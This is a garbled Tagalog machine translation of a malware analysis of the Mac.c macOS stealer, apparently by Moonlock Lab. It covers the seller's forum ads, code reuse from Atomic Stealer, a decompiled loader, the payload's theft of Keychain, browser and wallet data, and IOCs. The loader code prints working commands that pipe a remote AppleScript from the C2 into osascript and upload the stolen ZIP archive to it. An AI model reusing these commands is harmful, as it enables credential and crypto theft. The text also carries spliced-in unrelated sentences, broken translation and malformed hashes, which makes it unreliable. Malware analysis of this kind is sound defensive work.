Ang kasaysayan ng Mac.c stealer ay hindi nagsisimula sa isang pangunahing kampanya o breach. Ito ay nagsisimula sa mga hushed corner ng darknet forums, kung saan ang isang threat actor na tinatawag na 'mentalpositive' unang tumuturo, pag-atake ang atin sa isang set ng unusual na mga tampok na nagpapakita sa kanya mula sa iba pang mga stealer developer. Ang MacPaw, ang division ng cybersecurity ng MacPaw, ay nag-tracking mentalpositive para sa nakaraang limang buwan. Maaari natin na nakita na ito ay isang bagong aktor na gumagamit ng isang merkado ng macOS malware na may mas mababa na natutunan kaysa sa kanyang Windows counterpart, na inihahanda ang pagdiriwang ng bagong wave ng mga actors ng threat na both technically skilled at commercially ambitious. ang moonlock Habang lamang sa nakalipas na aktibo, ang Mac.c ay na-competite sa mas malaking, mas itinatag na operations ng stealer tulad ng Kapag nalaman ng isang babae na siya ay nagdadalangtao, una niyang dapat gawin ay magpa-prenatal check up. Bilang ang higit pang mga URL ay idinagdag sa kanyang command-and-control infrastructure, ang Mac.c ay nagpapakita na maging bahagi ng isang mas mataas na subterranean ecosystem na target sa mga gumagamit ng macOS. Mga pahinang tumuturo sa macOS Stealer angro4 Ang 'mentalpositive' shared progress updates at kahit na nakuha na feedback sa Mac.c builds - isang mahirap na antas ng transparency sa tipikal na secretive mundo ng macOS malware development. Sa artikulong ito, i-trace ang evolution ng Mac.c, i-unpack mentalpositive's tactics, at i-examine kung paano ang stealer na ito matatagpuan sa mas mataas na landscape ng mga threats na target sa Apple platforms. Isang bagong player sa market Halos dalawang buwan ang nakalipas, ang Moonlock Lab unang nakikita ang pag-unlad ng Mac.c stealer at inihahanda ito sa isang developer sa ilalim ng alias 'mentalpositive'. Ang tagumpay na ito ay isa sa maraming mga bagong manlalaro na dumating sa merkado ng macOS malware, isang lugar na ngayon ay mas mabuti kaysa sa industriya ng Windows-targeting malware. Tulad ng iba pang mga actors ng threat, ang 'mentalpositive' ay nagtatrabaho ng mga pinakabagong mga trend sa pag-unlad ng malware: modular na arkitektura para sa paggamit sa iba't ibang mga kampanya, advanced na mga teknolohiya ng obfuscation, at higit pa sa kompleksong mga infrastructure ng command-and-control (C2). Gayunpaman, ang target profile at data exfiltration scope ng mentalpositive's Mac.c ay nagkakahalaga. Itakda ito ng iCloud Keychain credentials, browser-stored password, crypto wallets, system metadata, at kahit na mga file mula sa anumang mga lokasyon sa macOS - lahat ng gumagamit ng credentials na nakuha sa pamamagitan ng phishing. Sa pamamagitan ng pag-aalok sa mga standard system APIs at staged communication methods, itakda ito ang maraming mga tradisyonal na endpoint defences. Pagbuo ng Public Sa paglipas ng mga teknikal na disenyo, ang "mentalpositive" ay nag-exhibited ng unusual behavior sa lahat ng darknet forums. Sa paglipas ng ilang buwan, ang threat actor na ito ay gumagamit ng isang underground forum upang ipakita ng incremental updates sa Mac.c, makipag-ugnayan sa mga potensyal na gumagamit, at actively solicit feedback. Ang reklamo na ito ay maaaring sinignan ng isang pananampalataya upang masiguro ang visibility at i-cut out ng isang distinctive presence sa merkado. Ito ay din ay nagpapakita na magdadala ng mga pangunahing pangunahing para sa isang custom stealer-as-a-service business model na tinutukoy na malapit sa macOS threat niche. Ang mga screenshot sa ibaba ay nagpapakita kung paano ang mga post ng forum ay bumuo sa panahon bilang mga bagong mga tampok ay inihayag. Dahil ang mga orihinal na posts ay isinulat sa Russian, kami ay binubuo ng isang short explanation para sa bawat isa. Ang unang screenshot ay nagpapakita ng isang unang ad na nag-aalok ng isang subscription sa stealer updates para sa $ 1,500 bawat buwan. Pagkatapos, 'mentalpositive' ibinigay ng isang detalyadong paglalarawan ng mga tampok ng Mac.c. Ayon sa kanila, ang ilan sa mga pinaka-mahalagang mga update ay kabilang ang: pagbawi ng orihinal na Ledger Live app, pagbawi ng binary size ng file (para sa mas mabilis na pag-download at posibleng mas mababa-detectable artefact sa pamamagitan ng static analysis), at optimization ng administrative panel. Sa katunayan na ito, isang panel ay naglalaman ng isang web-based interface para sa 'mentalpositive' mga customer, ang mga benta ng Mac.c stealer. Ito ay nagbibigay-daan sa kanila upang lumikha ng malware builds, pag-track ang mga infection (kabilang sa nakumpleto at nangangahulugang mga pagsubok), at mag-manage ang iba pang mga detalye ng kampanya. Tulad nila Tirso at Lyn ang mga anak nila, very friendly at magalang.Tulad nila Tirso at Lyn ang mga anak nila, very friendly at magalang. Si Tox at si Jabber. ang telegram At lastly, ang pinakabagong post sa oras ng pag-script ay naglalarawan ng mga karagdagang mga update. Ang mga ito ay kabilang ang pag-aayos ng XProtect sa pamamagitan ng generating unique builds mula sa zero, isang expanded listahan ng suportahan ng mga browser, file grabber activation sa pamamagitan ng control panel, at karamihan sa karamihan ng isang separado na module para sa phishing Trezor seed phrases. Similar to the existing Ledger Live module, ang bagong feature na ito ay magagamit para sa isang karagdagang pagkakataon ng $1,000. Mga pahinang tumuturo sa Amos Interestingly, ang ilang mga developer sa likod ng mga competing stealers ay naniniwala ang orihinalidad ng Mac.c code, nagpapakita na ito ay maaaring maging isang modified bersyon ng kilalang Atomic macOS Stealer. Ang Moonlock Lab ay nag-analysado at nakilala ang mga pinakabagong payloads ng dalawang stealers, at ang AMOS ay tinatawag sa detalye sa Habang ang dalawang bahagi ng identical code, ang functionality na inihayag ng 'mentalpositive' ay mas mababang limitado. One of our recent mga artikulo (Idinirekta sa red colour) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff Nakita ko ang first in the wild: 2025-06-19 20:18:55 ' (Highlighted sa green colour) mentalpositive SHA256: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 Nakita ko ang first in the wild: 2025-07-01 15:41:49 Ang isang detalyadong pag-inspection ay nagpapakita ng karaniwang reuse ng code sa layunin ng function sa pagitan ng Mac.c at Atomic macOS Stealer. Sa ilang mga kaso, ang mga function ay nagpapakita na ang mga kopya ng verbatim o na may minimal na mga pagbabago, na nagpapakita sa either isang shared development origin o direct code borrowing. Functionally, ang dalawang stealers ay nagbibigay ng isang halos identical feature set na dinisenyo para sa komprehensibong data theft sa macOS systems. Sa parehong mga kaso, ang mga kakayahan na ito ay i-execute gamit ang native macOS tools at scripting, minimize external dependencies at mapabuti ang evasion. Sa kabuuan ng kanilang karagdagang mga internasyonal, AMOS ay nagpapakita ng mga pangunahing pag-unlad sa persistence, modularity, at targeting. The table below highlights features unique to each stealer: Habang ang Mac.c ay gumagana bilang isang compact, non-persistent na AppleScript-based stealer, ang Atomic macOS Stealer ay nagpapakita ng isang mas advanced, persistent, at modular na katangian ng parehong philosophy ng disenyo. Ang mataas na antas ng reuse ng code ay nagpapakita ng mga mahalaga na mga tanong tungkol sa pag-atribusyon, availability ng builder, at potensyal na kolaborasyon sa ilalim ng macOS malware development circles. Habang ang tool ng 'mentalpositive' ay maaaring mas bagong, ito ay hindi ganap na orihinal - at ang AMOS ay ang mas kapani-paniwala at malusog stealer variante na nakikita sa wild ngayon. Paano gumagana ang Mac.c Stealer Namin ang lahat ng pag-ibig upang pumunta shopping, at vacation time. Since then, ang kanilang mga operating domain ay hindi nagbabago: https://lagkill[.]cc. Ito ay nag-host ng mga PHP file na ginagamit para sa pag-tracking ng mga biktima at ilang mga proseso ng exfiltration. 'mentalpositive' Tungkol sa Moonlock Lab Ang domain na ito ay may relasyon sa maraming mga file ng Mach-O, ngunit sa pangkalahatan, ang workflow ay maaaring i-summarize sa 2 pangkat: Mach-O initial executable at AppleScript payload. Etape 1: Ang Mach-O ay nagsisimula Ang Mac.c stealer ay nagtatrabaho ng isang multi-stage execution strategy, na ang kanyang unang stage ay nagtatrabaho bilang isang lightweight loader na responsable para sa stealthy deployment, environmental sanitization, at kontrolado na paghahatid ng susunod na payload. Sa itaas ay isang detalyadong paghahatid ng stage na ito, batay sa reverse engineering ng sample 90309fc3b901df1d7b6d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c entry point (entry()) starts by forking the current process and creating a new session via setsid(), effectively daemonizing itself. This detaches malware from any controlling terminal and allows it to run in the background. Sa karagdagang, nakita namin ang pangunahing functionality na redirect ang lahat ng mga standard na input, output, at error streams sa /dev/null gamit ang freopen(). Ito neutralizes console output na maaaring ilagay ng suspicion sa debug logs o terminal monitors. Ang malware hardcodes ang command-and-control (C2) domain bilang: lagkill[.]cc. Ito din generates ang isang unikat na identificator ng biktima sa pamamagitan ng concatenating multiple static hexadecimal strings. Ito ay nagpapakita sa isang pseudo-unique txd token, ginagamit upang fingerprint ang nakakaalamang host o upang patakbuhin ang mga batch ng infection sa panahon ng C2 komunikasyon. Ang pangunahing aksyon sa katapusan na ito ay pagkuha at i-execute ang isang remote AppleScript. Ito ay dumating sa pamamagitan ng chaining curl at osascript upang i-download at pagkatapos ay i-execute ang payload: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Ang methode na ito ay nagbibigay-daan sa attacker upang i-update ang payload dynamically nang walang pag-modify ang loader, na gumawa ng pag-atribusyon ng mas malubhang dahil sa indirect execution path. Pagkatapos ng pag-execute ng AppleScript (na kung saan ay posible na gawin ang lokasyon ng data steal), ang loader check para sa pag-success at nagsimula sa pag-exfiltrate ng isang ZIP archive back sa parehong C2 server: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Ang pag-upload na ito ay inilathala gamit ang mga custom headers (cl: 0) at isang mahusay na timeout upang makakuha ng mas madalas na mga sistema, na nagpapakita ng cautious attention sa operational stability. Pagkakaiba 2: AppleScript payload Ang ikalawang katapusan ng Mac.c stealer ay kung saan nagsisimula ang tunay na damages. Ang isang AppleScript payload ay nagtatrabaho ng native macOS scripting mga kakayahan upang i-extract ang isang malalaking array ng sensitibo na data. Maraming, ito ay dumating ito nang walang pag-aalala ng anumang compiled binaries o nangangailangan ng mataas na mga privileges at isang phished password ay matatagpuan. Sa ibaba, tumutukoy namin ang taktika ng second-stage payload sa pamamagitan ng kategorya. Credential theft & CLI abuse Ang script ay lumabas ng isang fake system prompt na nangangailangan ng user password. Ito ay ibinigay sa plaintext at reused pagkatapos. Pagkatapos ay silent na inilabas ang security CLI utility upang i-extract sa mga i-save credentials mula sa Keychain, lalo na sa mga target ng Google Chrome at Chromium-based apps. Ang mga data na natagpuan ay isulat sa /tmp/<random>/Password. Ang taktika ng phishing na ito ay gumagamit ng native trust at kilala ng macOS interface upang umuwi ang user skepticism. No code signing o persistence tricks kailangan. Browser and extensions data theft Ang mga target na mga browser ay kabilang ang Chrome, Edge, Brave, at Yandex. Ipasok ang mga file: login data, cookies, web data, indexedDB storage. Gayunpaman, ang script iterates sa pamamagitan ng mga hundred na kilala na mga extension ng crypto wallet - tulad ng MetaMask, Phantom, at Binance Wallet - at i-tap ang mga lokal na file ng storage o mga artifact ng session. Ang lahat ng browser-related loot ay organized sa /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting Ang payload scans para sa presensya ng mga popular na desktop crypto wallets, kabilang ang: Electrum ang ang exodus ang koinomi ang atomic Monero ang Mga Wasabi Mga Live Ledger Ang mga katangian ng data tulad ng mga file ng wallet at mga database ng configuration (tulad ng mga directory ng LevelDB) ay kopya sa /tmp/<random>/Cryptowallets/. Ito ay nagpapakita ng isang malinaw na financial motivation, na ang targeting ay nakatuon sa macOS crypto-enthusiast user base. File-grabber and its logic Upang maximize ang value ng intelligence habang minimize ang footprint, ang script ay gumagana ang mga sumusunod: Recursively searches ang user's Desktop, Documents, at Downloads mga folder. Mga filter para sa mga uri ng file ng mataas na halaga: .wallet, .seed, .txt, .keys, .pdf, .docx. Ipasok ang limit sa size ng file ~10MB. Ang paghahatid na ito ay nag-priorize ng mga low-noise, high-signal na mga file na naglalaman ng mga potensyal na phrases, recovery keys, at sensitive PDFs. Collection of messaging and app artifacts Mac.c i-copy ang folder ng tdata, na maaaring naglalaman ng active session tokens o cached messages (ang mga na nakikipag-ugnayan sa Telegram). Ang mga file ng configuration mula sa Binance at Ton Keeper apps ay kopyado din, na nag-aalok ng pag-iisip sa paggamit ng wallet, mga pattern ng login, o mga ibinigay na keys. Tipikal na paggamit ng system_profiler upang makuha ang data ng hardware, macOS, at display. Ang broad sweep na ito ay nagpapakita ng isang pananampalataya upang re-construct ang user's context, hindi lamang exfiltrate assets. Archiving and exfiltration Ang lahat ng mga data na nakuha ay na-organize sa isang strukturadong temporary directory /tmp/<random>/. Sa paggamit ng ditto -c -k, ang native archiving tool ng macOS, ang buong directory ay zipped sa /tmp/osalogging.zip. Pagkatapos ng archiving, ang payload ay umalis. Walang background monitoring o repetitive execution. Ang stealth-focused, ephemeral na disenyo na ito ay nagpapakita sa isang mabilis na pag-smash-and-grab operation, posibleng ibinibigay para sa isang single-use access o bilang bahagi ng isang mas mataas na linya ng infection. Ang mga phishing Ang isang karagdagang masamang teknolohiya na ginagamit sa second-stage payload ng 'mentalpositive' ay naglalaman ng isang false system prompt na masiguro bilang isang pangangailangan ng permission ng laro. Sa karamihan, ang Mac.c ay nag-aalok ng isang native AppleScript dialog na nag-aalok ng gumagamit upang i-introduce ang kanilang macOS login password upang "hindi ang laro Mag-save ang mga file mo.” ang mga witches Sa karagdagang, ang mga payloads na ito ay may isang build tag na "innocent" (o, sa ilang mga kaso, "innocent"), na maaaring ginagamit upang identify ang mga infection na nakatuon sa anumang kampanya. Sa katunayan, ang domain na maaaring i-lease na espesyal para sa kampanya na ito ay innocentwitches[.]top. Habang ang root URL ay redirect sa Google, ito ay binubuo din ng isang /upload.php route, na nagbibigay-daan sa mga tagahanga na makakuha ng nakuha ng mga data. mga konklusyon Habang ang mga computer ng Mac ay patuloy na tumataas sa popularidad sa mga average na gumagamit at ang mga may-ari ng crypto sa karamihan, inaasahan namin na ang mga stealers ay mag-scale, hindi lamang sa kanilang mga kapasidad, ngunit sa kanilang bilang ng merkado at epekto. Mac.c ay hindi isang isolatong kaso, ngunit bahagi ng isang tumutukoy na trend sa pamamagitan ng professionalized macOS malware development. Habang ito reuse ang mga pangunahing function at arkitektural na mga elemento mula sa popular na Atomic Stealer, ito rin ay nagdadala ng novelty sa macOS stealers at ilagay ang mga ito sa isang distinctive trajectory. Ang kung ano ang dapat natagpuan ay ang pag-unlad ng isang bagong modelo ng negosyo: stealer-as-a-service, na tinutukoy na para sa mga gumagamit ng macOS at pag-aralan mula sa mas malware-as-a-service industriya. Habang Atomic Stealer ay patuloy na isang mas malusog na bersyon, ito ay maaaring maging lamang isang kwento ng oras kung saan ang mga bagong ambisyonong mga manlalaro ay gamitin ang kanyang legacy upang bumuo ng isang mas stealthier at mas malware na produkto. ang IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7dfd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7 57b86903c46cf45c968aa9618c0a45eb135e05b24c13c0d27442d4387de37319 48b48e8433f6bf212c06157bead662f1833b72671b8f832ff3af032fdc4582
